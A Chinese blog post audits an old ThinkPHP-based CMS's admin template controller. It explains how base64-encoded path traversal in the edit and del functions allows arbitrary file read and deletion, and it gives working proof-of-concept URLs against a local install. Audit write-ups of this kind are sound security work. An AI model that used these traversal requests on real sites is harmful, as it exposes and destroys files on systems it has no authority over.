[PHP代码审计]记一次后台任意文件读取&删除的审计

0x01 前言

一个很老的cms了,感谢小阳师傅给的练手cms,以下仅为此cms其中一个任意文件读取漏洞和任意文件删除漏洞的审计笔记。

0x02 目录分析

拿到这个cms的时候发现是基于thinkphp3.2.3的框架结构开发的,代码审计前,看了下thinkphp3.2.3的开发手册,在看了整体目录和部分代码后,对目录的一个分析(仅为个人见解):

└── uploads_code
    ├── App	默认应用目录	
    │   ├── Api		(api接口)
    │   ├── Common	(公共模块,不能直接访问)
    │   ├── Home		(前台模块)
    │   ├── Html		(啥也没有)
    │   ├── Manage	(后台的功能模块)
    │   ├── Mobile
    │   └── Runtime	(缓存)
    ├── Data	应该是一些后台的插件应用(默认就是那样的)
    │   ├── config
    │   ├── editor
    │   ├── resource
│   └── static
├── Library	cms图标
    ├── Include
    │   ├── Common	公共函数目录
    │   ├── Conf		配置文件目录
    │   ├── Home
    │   ├── Lang
    │   ├── Library
    │   ├── Mode		模型目录
    │   ├── Runtime	缓存日志
    │   └── Tpl
    ├── Install	cms安装目录
    │   ├── css
    │   ├── images
    │   ├── inc
    │   └── tpl
    ├── Public	资源文件目录
    │   ├── Home
    │   └── Mobile
    ├── avatar
    │   └── system
    └── uploads	应该是一些上传后文件的存储位置
        ├── abc1
        ├── file1
        ├── img1
        └── system
-index.php		首页
-xyhai.php		后台

0x03 代码分析

3.1 任意文件读取漏洞

先用seay对代码进行了一个自动审计,然后优先级是先看app目录下的审计结果。
根据seay的审计结果,定位到一个任意文件读取漏洞在/App/Manage/Controller/TempletsController.class.php下
在这里插入图片描述
继续通过seay工具定位到具体位置,发现漏洞是在edit函数下。
代码如下:

	public function edit() {
    
    
		$ftype     = I('ftype', 0, 'intval');
		$fname     = I('fname', '', 'trim,htmlspecialchars');
		$file_path = !$ftype ? './Public/Home/' . C('CFG_THEMESTYLE') . '/' : './Public/Mobile/' . C('CFG_MOBILE_THEMESTYLE') . '/';
		if (IS_POST) {
    
    
			if (empty($fname)) {
    
    
				$this->error('未指定文件名');
			}
			$_ext     = '.' . pathinfo($fname, PATHINFO_EXTENSION);
			$_cfg_ext = C('TMPL_TEMPLATE_SUFFIX');
			if ($_ext != $_cfg_ext) {
    
    
				$this->error('文件后缀必须为"' . $_cfg_ext . '"');
			}

			$content  = I('content', '', '');
			$fname    = ltrim($fname, './');
			$truefile = $file_path . $fname;
			if (false !== file_put_contents($truefile, $content)) {
    
    
				$this->success('保存成功', U('index', array('ftype' => $ftype)));
			} else {
    
    
				$this->error('保存文件失败,请重试');
			}

			exit();
		}

		$fname = base64_decode($fname);
		if (empty($fname)) {
    
    
			$this->error('未指定要编辑的文件');
		}
		$truefile = $file_path . $fname;

		if (!file_exists($truefile)) {
    
    
			$this->error('文件不存在');
		}
		$content = file_get_contents($truefile);
		if ($content === false) {
    
    
			$this->error('读取文件失败');
		}
		$content = htmlspecialchars($content);

		$this->assign('ftype', $ftype);
		$this->assign('fname', $fname);
		$this->assign('content', $content);
		$this->assign('type', '修改模板');
		$this->display();
	}


声明了3个变量
$ftype 文件类型
$fname 文件名
$file_path 文件路径
然后进行了一个判断是否为POST传输,这段代码整体应该是对文件起一个保存的作用。非post传输的则会直接跳过这段代码
在这里插入图片描述

继续向下,将$fname 进行base64编码后进行输出,判断fname是否为空,非空则会拼接成完整的文件路径,然后判断文件是否存在,然进行读取文件内容。然后会将整内容这些显示在修改模板上。
在这里插入图片描述
利用方法:
(Ps:由于/App/Manage/是后台功能,所以此漏洞是需要进行后台登录的)
将需要进行读取的文件base64编码即可,例如读取我电脑上phpstudy默认生成的index.html文件
…/…/…/…/…/index.html

http://127.0.0.1/xyhcms3.5/uploads_code/xyhai.php?s=/Templets/edit/fname/Li4vLi4vLi4vLi4vLi4vaW5kZXguaHRtbA==

在这里插入图片描述

3.2 任意文件删除漏洞

同样在这个文件下,还存在一个任意文件删除漏洞。在124行的del函数下
在这里插入图片描述
这里的逻辑跟前面的edit函数 的任意文件读取差不多的。
将fname变量进行base64编码
然后判断传入的参数是否存在,进行文件地址拼接后执行删除等操作。利用方法也一样

http://127.0.0.1/xyhcms3.5/uploads_code/xyhai.php?s=/Templets/del/fname/Li4vLi4vLi4vLi4vLi4vaW5kZXguaHRtbA==

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/xiaoguaiii/article/details/108095087